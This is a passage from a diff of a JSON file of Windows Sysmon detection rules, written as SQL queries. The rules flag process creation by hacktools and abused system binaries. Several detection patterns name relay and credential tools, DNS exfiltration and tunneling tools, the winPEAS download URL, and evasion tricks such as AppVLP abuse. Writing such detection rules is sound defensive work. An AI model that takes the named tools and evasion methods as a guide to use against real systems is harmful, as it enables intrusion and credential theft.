"id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "status": "experimental", + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE '%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "title": "HackTool - winPEAS Execution", + "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "Suspicious Process Start Locations", - "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", - "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "status": "experimental", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrator" + "Legitimate use by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + 